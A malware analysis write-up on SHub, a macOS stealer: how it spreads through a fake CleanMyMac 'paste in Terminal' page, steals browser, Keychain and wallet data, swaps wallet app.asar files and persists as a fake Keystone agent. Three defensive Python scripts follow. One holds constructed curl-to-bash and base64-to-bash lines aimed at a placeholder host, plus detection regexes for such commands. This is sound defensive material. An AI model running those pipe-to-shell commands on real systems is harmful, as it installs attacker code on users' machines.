SHub Stealer
SHub is an information-stealing malware family that targets macOS. Its primary objective is to extract sensitive data from browsers, cryptocurrency wallets, and several parts of the operating system. It is particularly dangerous because it combines credential theft, cryptocurrency targeting, and a persistent backdoor in a single toolset.
The malware is commonly distributed through deceptive methods that trick users into executing malicious commands themselves. Once active, SHub silently gathers valuable data and can maintain long-term access to the infected device. Due to the extent of the information it can collect, this threat poses serious risks, including financial losses, identity theft, and account compromise. Immediate removal is essential if SHub is discovered on a system.
Initial Infection and System Verification
The infection begins with a loader that runs on the victim's Mac. Before fetching the full payload, the loader performs several checks on the system. The most notable one looks for a Russian keyboard layout: if one is present, the loader stops and reports that fact to the operators, a check commonly used by malware to avoid infecting machines in the operators' own region.
If the verification stage is successful, the loader collects and transmits basic system details to the attackers' infrastructure. These details include the device's IP address, hostname, macOS version, and keyboard language settings. This information helps the attackers profile the infected machine before proceeding with further actions.
The loader then downloads a script that displays a dialog imitating the standard macOS password prompt, asking for the user's account password as if it were a routine system request. The dialog is drawn by the script, not by the system, so anything typed into it goes straight to the attackers. With the password they can unlock the login Keychain, which stores saved passwords, Wi-Fi credentials, certificates, and private keys.
Extensive Data Collection from Browsers and Wallets
Once access to the system is secured, SHub begins scanning the device for valuable data stored in web browsers and cryptocurrency applications. The malware targets a wide range of Chromium-based browsers, including Arc, Brave, Chrome, Chrome Beta, Chrome Canary, Chrome DevTools, Chromium, Edge, Opera, Opera GX, Orion, Sidekick, Vivaldi, and Coccoc. It also targets Firefox.
From these browsers, the malware extracts stored credentials, cookies, autofill information, and other profile data across all user profiles. The malware also inspects installed browser extensions in search of cryptocurrency wallet extensions.
SHub is capable of stealing information from more than one hundred known cryptocurrency wallets. Examples include Coinbase Wallet, Exodus Web3, Keplr, MetaMask, Phantom, and Trust Wallet. By accessing these extensions, attackers can obtain authentication tokens, wallet access data, and other sensitive details tied to cryptocurrency accounts.
Targeting Desktop Cryptocurrency Applications
In addition to browser-based wallets, SHub focuses heavily on desktop cryptocurrency wallet applications installed on the system. The malware collects data from a large number of wallets, including Atomic Wallet, Binance, Bitcoin Core, BlueWallet, Coinomi, Dogecoin Core, Electrum, Exodus, Guarda, Ledger Live, Ledger Wallet, Litecoin Core, Monero, Sparrow, TON Keeper, Trezor Suite, and Wasabi.
Sensitive data extracted from these applications may include wallet credentials, private keys, and other authentication information. This data can enable attackers to gain direct control over cryptocurrency holdings.
Beyond wallet software, SHub harvests other sensitive data from the macOS environment: the Keychain (unlocked with the password captured earlier), iCloud account information, Safari cookies and browsing history, the Apple Notes database, and Telegram session files. It also copies the files .zsh_history, .bash_history, and .gitconfig. These are valuable because developers often leave API keys, tokens, or other credentials in shell history (for example in exported environment variables or in one-off curl commands) and in git configuration.
Wallet Manipulation for Ongoing Data Theft
SHub does more than simply collect stored information. It can also modify certain cryptocurrency wallet applications in order to maintain continuous data theft even after the initial compromise.
If the malware finds Atomic Wallet, Exodus, Ledger Live, Ledger Wallet, or Trezor Suite, it replaces the application's 'app.asar' with a malicious version. app.asar is the archive in which Electron applications ship their JavaScript, so whatever replaces it runs with the wallet's own identity and user interface: the wallet keeps working normally from the user's perspective while the injected code runs in the background. Because app.asar sits among the bundle's sealed resources, swapping it invalidates the bundle's code signature, which a check such as codesign --verify --deep --strict on the .app will report.
Through this modification, the compromised wallet applications continue transmitting sensitive information to the attackers. The stolen data may include wallet passwords, seed phrases, and recovery phrases. Some variants of the malware are capable of displaying fake recovery prompts or security update messages to trick users into entering their seed phrases directly.
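The following script is an added example for this write-up, not SHub code and not a tool from any wallet vendor. It shows how a responder can check the wallets named above for a swapped app.asar: it hashes Contents/Resources/app.asar against a known-good value (which must come from a clean install or the vendor; none is published here), applies a modification-time heuristic of my own (an app.asar materially newer than the bundle's main executable was written after installation), and, on macOS only, runs codesign as the authoritative check. The bundle layout it assumes is the standard Contents/Resources and Contents/MacOS structure; the sample bundle built by make_sample_bundle() is constructed for the example and is not a real wallet.

```python
"""Tamper check for Electron wallet bundles whose app.asar may have been swapped.

Added example; not SHub code and not any wallet vendor's tool. Assumes the
standard bundle layout Contents/Resources/app.asar and
Contents/MacOS/<CFBundleExecutable>. The known-good hash must come from a
clean install or the vendor. make_sample_bundle() builds a constructed
stand-in, not a real wallet.
"""
import hashlib
import os
import plistlib
import subprocess
import tempfile
import time
from pathlib import Path

# Wallets the write-up names as targets of the app.asar replacement.
WALLET_BUNDLES = [
    "/Applications/Atomic Wallet.app",
    "/Applications/Exodus.app",
    "/Applications/Ledger Live.app",
    "/Applications/Trezor Suite.app",
]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def check_electron_bundle(app_path, expected_sha256=None, skew_seconds=60):
    """Hash app.asar, compare to a known-good value, and apply an mtime heuristic.

    Returns a dict; an empty 'findings' list means no indicator was observed.
    """
    app = Path(app_path)
    asar = app / "Contents" / "Resources" / "app.asar"
    result = {"app": str(app), "asar": None, "sha256": None, "findings": []}
    if not asar.is_file():
        return result  # not installed, or not an Electron app
    result["asar"] = str(asar)
    result["sha256"] = sha256_file(asar)
    if expected_sha256 and result["sha256"] != expected_sha256.lower():
        result["findings"].append("app.asar hash differs from the known-good value")
    # Heuristic (assumption): an installer writes the whole bundle in one go, so
    # an app.asar materially newer than the main executable was written later.
    try:
        info = plistlib.loads((app / "Contents" / "Info.plist").read_bytes())
        exe = app / "Contents" / "MacOS" / info["CFBundleExecutable"]
        if asar.stat().st_mtime > exe.stat().st_mtime + skew_seconds:
            result["findings"].append("app.asar was modified after the main executable")
    except (OSError, KeyError, plistlib.InvalidFileException):
        result["findings"].append("could not read Info.plist or the main executable")
    return result


def codesign_verify(app_path):
    """Authoritative check on macOS: a swapped app.asar breaks the sealed resources."""
    proc = subprocess.run(["codesign", "--verify", "--deep", "--strict", str(app_path)],
                          capture_output=True, text=True)
    return proc.returncode == 0, proc.stderr.strip()


def make_sample_bundle(tampered=False):
    """Build a constructed bundle in a temp dir; returns (path, hash of the clean asar)."""
    app = Path(tempfile.mkdtemp()) / "Exodus.app"
    (app / "Contents" / "MacOS").mkdir(parents=True)
    (app / "Contents" / "Resources").mkdir(parents=True)
    (app / "Contents" / "Info.plist").write_bytes(plistlib.dumps({"CFBundleExecutable": "Exodus"}))
    exe = app / "Contents" / "MacOS" / "Exodus"
    asar = app / "Contents" / "Resources" / "app.asar"
    exe.write_bytes(b"\xcf\xfa\xed\xfe")      # Mach-O magic stands in for the binary
    asar.write_bytes(b"clean asar contents")  # placeholder bytes, not a real asar
    installed = time.time() - 7 * 24 * 3600   # pretend the install happened a week ago
    os.utime(exe, (installed, installed))
    os.utime(asar, (installed, installed))
    good = sha256_file(asar)
    if tampered:
        asar.write_bytes(b"malicious asar contents")  # rewrite leaves a fresh mtime
    return app, good


if __name__ == "__main__":
    for bundle in WALLET_BUNDLES:
        r = check_electron_bundle(bundle)
        if r["asar"]:
            ok, err = codesign_verify(bundle)
            print(bundle, r["sha256"], "codesign ok" if ok else err, r["findings"])
```

Run it on the affected Mac and compare each printed hash with one taken from a freshly downloaded copy of the same wallet version; the mtime heuristic is only a hint, since a legitimate in-app update can also rewrite app.asar, whereas a codesign failure on a vendor-signed bundle is conclusive.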
Persistence and Remote Control Capabilities
To keep long-term access, SHub installs a backdoor that lets the attackers communicate with the infected Mac: a launchd agent whose property list is named 'com.google.keystone.agent.plist'. The name copies the file that Google's own software update agent (Keystone) installs in ~/Library/LaunchAgents, so the file name alone does not separate the malicious agent from the legitimate one; what the plist tells launchd to execute does.
Each time launchd runs the agent, it starts a hidden script that sends the Mac's hardware identifier to a remote server and polls for instructions. This gives the operators a remote command channel on the device for as long as the agent stays installed.
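Because the persistence file name collides with a legitimate one, a hunt has to look at what each plist executes. The script below is an added example for this write-up, not SHub code or a tool it mentions: it parses launchd plists, treats the directory the genuine Keystone agent runs from (assumed here as the allow-list) as the reference for any Google-branded label, and flags plists that hand an interpreter a script from a hidden path. Both sample plists are constructed; the script path in the first is invented for illustration, not an indicator from the write-up.

```python
"""Triage launchd agents by what they execute, not by their file name.

Added example; not SHub code and not a tool the write-up mentions. Google's
Keystone updater installs ~/Library/LaunchAgents/com.google.keystone.agent.plist
itself, so the checks compare the program a plist runs against the directory
the genuine agent lives in (an assumption for this example) and look for
interpreter-plus-hidden-script patterns. Both sample plists are constructed.
"""
import os
import plistlib
from pathlib import Path

# Genuine Keystone runs from <home>/Library/Google/GoogleSoftwareUpdate/ or the
# system-wide /Library/Google/GoogleSoftwareUpdate/. Allow-list assumed here.
KEYSTONE_DIR = "/Library/Google/GoogleSoftwareUpdate/"
INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python", "python3", "perl", "curl"}


def classify_launch_agent(plist_bytes):
    """Return label, program, findings (count toward the verdict) and notes."""
    p = plistlib.loads(plist_bytes)  # accepts XML and binary plists
    label = str(p.get("Label", ""))
    args = [str(a) for a in p.get("ProgramArguments", [])]
    program = str(p.get("Program") or (args[0] if args else ""))
    findings, notes = [], []
    if "google" in label.lower() and KEYSTONE_DIR not in program:
        findings.append("Google-style label but program outside the Keystone directory")
    if os.path.basename(program) in INTERPRETERS:
        findings.append("runs an interpreter instead of a signed application binary")
    for arg in args:
        if any(part.startswith(".") and part not in (".", "..") for part in arg.split("/")):
            findings.append(f"references a hidden path: {arg}")
            break
    if p.get("RunAtLoad") and p.get("StartInterval"):
        notes.append(f"runs at login and every {p['StartInterval']}s")  # also true of Keystone
    return {"label": label, "program": program, "findings": findings, "notes": notes,
            "verdict": "suspicious" if findings else "no indicators"}


def scan_launch_agents(dirs=None):
    """Classify every plist in the usual launchd directories; unreadable files are reported."""
    dirs = dirs or [Path.home() / "Library/LaunchAgents", Path("/Library/LaunchAgents"),
                    Path("/Library/LaunchDaemons")]
    out = []
    for d in dirs:
        for f in sorted(Path(d).glob("*.plist")) if Path(d).is_dir() else []:
            try:
                out.append((str(f), classify_launch_agent(f.read_bytes())))
            except Exception as exc:
                out.append((str(f), {"error": repr(exc)}))
    return out


# Constructed: the shape the write-up describes (Google-like label, hidden script).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>/Users/victim/.cache/.agent.sh</string></array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>60</integer>
</dict></plist>"""

# Constructed: what the genuine Keystone agent plist looks like.
GENUINE_LOOKING_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Users/victim/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
    <string>-runMode</string><string>ifneeded</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""


if __name__ == "__main__":
    for path, r in scan_launch_agents():
        print(path, r)
```

The schedule (RunAtLoad plus StartInterval) is recorded as a note rather than a finding on purpose: the genuine Keystone agent uses the same pattern, so only the program path and the interpreter-plus-hidden-script combination discriminate between the two.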
To avoid alerting the victim during installation, the malware displays a deceptive error message stating that the application is not supported. This message leads users to believe the installation process failed, even though the malware has already been deployed successfully.
Distribution Through the ClickFix Technique
The primary distribution method for SHub relies on social engineering and a technique known as ClickFix. In this campaign, attackers create a fraudulent website that imitates the legitimate CleanMyMac software site. Visitors who believe they are downloading the authentic application are instead presented with unusual installation instructions.
Rather than receiving a normal installer file, users are instructed to open the macOS Terminal and paste a command to complete the installation process. When this command is executed, it downloads and runs a concealed script that installs the SHub malware.
The attack sequence typically unfolds in the following way:
- The victim visits a fake website impersonating the CleanMyMac download page.
- The site instructs the user to open Terminal and paste a provided command as part of the installation.
- Executing the command downloads and runs a hidden script that installs SHub on the system.
Because the victim runs the command in Terminal, the attack sidesteps the protections that apply to downloaded application bundles: a script fetched from the command line and piped into a shell never receives the quarantine attribute, so Gatekeeper never examines it, and no installer dialog or security warning appears.
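The ClickFix command leaves a trace in exactly the shell history files the write-up says SHub later steals, so one triage pass covers both questions: was a pasted install command run, and what secrets would the attacker have obtained from the same files? The script below is an added example for this write-up, not SHub code or a tool it mentions. The write-up does not publish the actual command shown on the fake CleanMyMac page, so the rules are generic (remote content piped into a shell, a base64-decoded payload piped into a shell, secrets exported as environment variables, GitHub and AWS key formats); the sample history, its URL and its token are constructed placeholders.

```python
"""Triage shell history for ClickFix-style install commands and leaked secrets.

Added example; not SHub code and not a tool the write-up mentions. The
patterns are generic assumptions, since the real command from the fake page
is not published here. The sample history below is constructed.
"""
import re
from pathlib import Path

# zsh extended history stores ": <epoch>:<duration>;<command>"; bash stores bare commands.
ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")

RULES = [
    ("remote-content-to-shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh)\b")),
    ("decoded-payload-to-shell",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh)\b")),
    ("eval-of-fetched-content",
     re.compile(r"\beval\b.*\$\(\s*(curl|wget)\b")),
    ("exported-secret",
     re.compile(r"\bexport\s+\w*(KEY|TOKEN|SECRET|PASS)\w*=\S+", re.IGNORECASE)),
    ("github-token", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    ("aws-access-key-id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
]


def parse_history(text):
    """Yield (epoch or None, command) for each line of zsh or bash history."""
    for raw in text.splitlines():
        line = raw.rstrip("\n")
        if not line.strip():
            continue
        m = ZSH_EXT.match(line)
        if m:
            yield int(m.group(1)), m.group(2)
        else:
            yield None, line


def triage_history(text):
    """Return only the entries that match at least one rule, with their tags."""
    hits = []
    for ts, cmd in parse_history(text):
        tags = [name for name, rx in RULES if rx.search(cmd)]
        if tags:
            hits.append({"ts": ts, "command": cmd, "tags": tags})
    return hits


def triage_home(home=None):
    """Run the triage over the history files the write-up says SHub copies."""
    home = Path(home or Path.home())
    results = {}
    for name in (".zsh_history", ".bash_history"):
        f = home / name
        if f.is_file():
            # zsh may store non-UTF-8 bytes for multibyte input; do not abort on them.
            results[name] = triage_history(f.read_text(errors="replace"))
    return results


# Constructed sample; the URL, the opaque base64 blob and the token are placeholders.
SAMPLE_HISTORY = "\n".join([
    ": 1700000000:0;ls -la ~/Downloads",
    ": 1700000010:0;curl -fsSL https://example.invalid/cleanmymac/install.sh | bash",
    ": 1700000020:0;echo Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUuaW52YWxpZC94LnNoIHwgYmFzaA== | base64 -d | bash",
    ": 1700000030:0;export GITHUB_TOKEN=ghp_" + "a" * 36,
    "git commit -m 'bump version'",  # bash-style line without a timestamp
])


if __name__ == "__main__":
    for name, hits in triage_home().items():
        for h in hits:
            print(name, h["ts"], h["tags"], h["command"])
```

The timestamp on the flagged zsh entry gives the earliest time the infection could have begun, which bounds the window for the rest of the investigation; every secret the script flags should be treated as compromised and rotated, because the same file was copied to the attackers.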
Security Risks and Potential Consequences
SHub represents a serious threat to macOS users because of its extensive data collection capabilities and long-term persistence features. Once installed, it can quietly harvest sensitive information and provide attackers with continuous remote access to the compromised device.
Victims of this malware may face a variety of consequences, including:
- Cryptocurrency theft from compromised wallet applications
- Identity theft resulting from stolen personal data and credentials
- Unauthorized access to online accounts and services
- Exposure of developer secrets such as API keys or authentication tokens
Given the scale of information that SHub can collect, preventing infection is critical. Obtain software only from the vendor's own site or the App Store, treat any download page that asks you to paste a command into Terminal as hostile, and never run commands whose source you cannot verify. If SHub is found, remove it promptly and assume every password, token, and wallet secret on the machine is compromised until rotated.